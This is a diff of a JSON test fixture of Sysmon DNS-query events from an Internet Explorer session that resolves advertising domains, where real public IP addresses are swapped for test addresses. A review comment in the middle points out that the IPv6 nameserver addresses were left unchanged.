Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16320,11 +16140,11 @@ }, "answers": [ { - "data": "35.186.236.204", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -16332,7 +16152,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -16340,7 +16160,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -16348,7 +16168,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -16356,7 +16176,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -16365,16 +16185,16 @@ } ], "resolved_ip": [ - "35.186.236.204", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -16390,23 +16210,23 @@ "mpp.vindicosuite.com" ], "ip": [ - "35.186.236.204", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313946362Z", + "ingested": "2021-12-09T13:49:44.739871800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16466,12 +16286,12 @@ }, "answers": [ { - "data": "8.41.222.152", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "8.41.222.152" + "89.160.20.156" ] }, "network": { 
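Review bot: The IPv4 gTLD nameserver addresses (`192.5.6.30`, `192.33.14.30`, …) were moved into `192.168.0.0/16`, but their IPv6 counterparts `2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30` and `2001:502:1ca1::30` remain real public addresses in `answers`, `resolved_ip`, the related `ip` list and `QueryResults`. If the geo processor is applied to every resolved address, those entries still depend on the live database and undercut the stated goal of confining the fixture to supported test addresses; if they are deliberately left because the pipeline skips them, that reasoning belongs in a comment next to the fixture. Either using a documentation prefix such as `2001:db8::` for them or noting the exception would make the intent clear to the next person regenerating this file.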
@@ -16486,13 +16306,13 @@ "sync.1rx.io" ], "ip": [ - "8.41.222.152" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313947627Z", + "ingested": "2021-12-09T13:49:44.739877800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:8.41.222.152;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16560,12 +16380,12 @@ "type": "CNAME" }, { - "data": "23.52.160.7", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.160.7" + "89.160.20.156" ] }, "network": { 
@@ -16582,13 +16402,13 @@ "sync.teads.tv" ], "ip": [ - "23.52.160.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313948951Z", + "ingested": "2021-12-09T13:49:44.739883500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16652,23 +16472,23 @@ "type": "CNAME" }, { - "data": "3.15.109.176", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.15.225.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.18.121.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.15.101.187", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -16676,7 +16496,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -16684,7 +16504,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -16692,22 +16512,22 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "3.15.109.176", - "52.15.225.252", - "3.18.121.79", - "3.15.101.187", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { 
@@ -16723,23 +16543,20 @@ "s.thebrighttag.com" ], "ip": [ - "3.15.109.176", - "52.15.225.252", - "3.18.121.79", - "3.15.101.187", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313950325Z", + "ingested": "2021-12-09T13:49:44.739890900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16803,12 +16620,12 @@ "type": "CNAME" }, { - "data": "54.192.55.189", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.192.55.189" + "89.160.20.156" ] }, "network": { 
@@ -16824,13 +16641,13 @@ "t.a3cloud.net" ], "ip": [ - "54.192.55.189" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313951700Z", + "ingested": "2021-12-09T13:49:44.739897300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -16898,12 +16715,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -16920,13 +16737,13 @@ "tps618.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313952979Z", + "ingested": "2021-12-09T13:49:44.739903200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", 
@@ -16998,52 +16815,52 @@ "type": "CNAME" }, { - "data": "54.157.69.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.139.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.233.36.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.54.198.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.55.201.28", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.210.34.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.163.149", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.232.198.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "54.157.69.185", - "18.209.139.81", - "18.233.36.36", - "52.54.198.81", - "52.55.201.28", - "18.210.34.44", - "52.72.163.149", - "18.232.198.130", - "192.5.6.30" + 